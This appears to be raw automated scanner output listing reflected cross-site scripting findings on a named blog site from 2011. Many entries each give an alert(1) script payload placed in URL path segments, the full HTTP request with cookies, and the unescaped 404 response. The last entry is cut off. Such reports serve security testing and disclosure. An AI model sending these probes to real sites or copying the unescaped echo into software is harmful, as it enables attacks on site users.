<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/play-listen-repeatd2f58<script>alert(1)</script>9cecf728f10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 410e8<script>alert(1)</script>b6acfa54d50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora410e8<script>alert(1)</script>b6acfa54d50/archives/rhode-island/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora410e8<script>alert(1)</script>b6acfa54d50/archives/rhode-island/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7510<script>alert(1)</script>e386b3405c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc7510<script>alert(1)</script>e386b3405c7/rhode-island/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc7510<script>alert(1)</script>e386b3405c7/rhode-island/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 61a2b<script>alert(1)</script>066ab1d13fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/rhode-island61a2b<script>alert(1)</script>066ab1d13fc/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/rhode-island61a2b<script>alert(1)</script>066ab1d13fc/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5b43<script>alert(1)</script>94fa79588e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae5b43<script>alert(1)</script>94fa79588e1/archives/roadtrip/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorae5b43<script>alert(1)</script>94fa79588e1/archives/roadtrip/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d8f8<script>alert(1)</script>102c29e82d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives3d8f8<script>alert(1)</script>102c29e82d/roadtrip/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives3d8f8<script>alert(1)</script>102c29e82d/roadtrip/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ccdb2<script>alert(1)</script>a59406e84d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/roadtripccdb2<script>alert(1)</script>a59406e84d7/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/roadtripccdb2<script>alert(1)</script>a59406e84d7/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e73b<script>alert(1)</script>402d0eee6e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6e73b<script>alert(1)</script>402d0eee6e6/archives/roadtrip/index.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora6e73b<script>alert(1)</script>402d0eee6e6/archives/roadtrip/index.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e3124<script>alert(1)</script>06bc8e10aef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese3124<script>alert(1)</script>06bc8e10aef/roadtrip/index.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivese3124<script>alert(1)</script>06bc8e10aef/roadtrip/index.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 94c76<script>alert(1)</script>fbd7c19bc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/roadtrip94c76<script>alert(1)</script>fbd7c19bc2/index.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 359
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/roadtrip94c76<script>alert(1)</script>fbd7c19bc2/index.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3e61d<script>alert(1)</script>1df9109ab61 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/roadtrip/index.html3e61d<script>alert(1)</script>1df9109ab61 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 360
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/roadtrip/index.html3e61d<script>alert(1)</script>1df9109ab61 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8354d<script>alert(1)</script>0b81ccc9992 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8354d<script>alert(1)</script>0b81ccc9992/archives/south-daktoa/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8354d<script>alert(1)</script>0b81ccc9992/archives/south-daktoa/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26b1e<script>alert(1)</script>c6bfcd2ec61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives26b1e<script>alert(1)</script>c6bfcd2ec61/south-daktoa/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives26b1e<script>alert(1)</script>c6bfcd2ec61/south-daktoa/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11e8c<script>alert(1)</script>8fd48e0eb0b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/south-daktoa11e8c<script>alert(1)</script>8fd48e0eb0b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 354 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/south-daktoa11e8c<script>alert(1)</script>8fd48e0eb0b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a87e3<script>alert(1)</script>667affef35b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa87e3<script>alert(1)</script>667affef35b/archives/tennessee/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraa87e3<script>alert(1)</script>667affef35b/archives/tennessee/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be7ff<script>alert(1)</script>bb3bcc17fa5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbe7ff<script>alert(1)</script>bb3bcc17fa5/tennessee/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbe7ff<script>alert(1)</script>bb3bcc17fa5/tennessee/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0a19<script>alert(1)</script>050c2fa5c54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/tennesseec0a19<script>alert(1)</script>050c2fa5c54/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/tennesseec0a19<script>alert(1)</script>050c2fa5c54/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dd0c<script>alert(1)</script>f718eac7bb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2dd0c<script>alert(1)</script>f718eac7bb6/archives/texas/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2dd0c<script>alert(1)</script>f718eac7bb6/archives/texas/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76e6c<script>alert(1)</script>5b51d9c237f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives76e6c<script>alert(1)</script>5b51d9c237f/texas/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives76e6c<script>alert(1)</script>5b51d9c237f/texas/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ea264<script>alert(1)</script>98cd7486264 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/texasea264<script>alert(1)</script>98cd7486264/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/texasea264<script>alert(1)</script>98cd7486264/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54e68<script>alert(1)</script>3cadd9a1ed0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
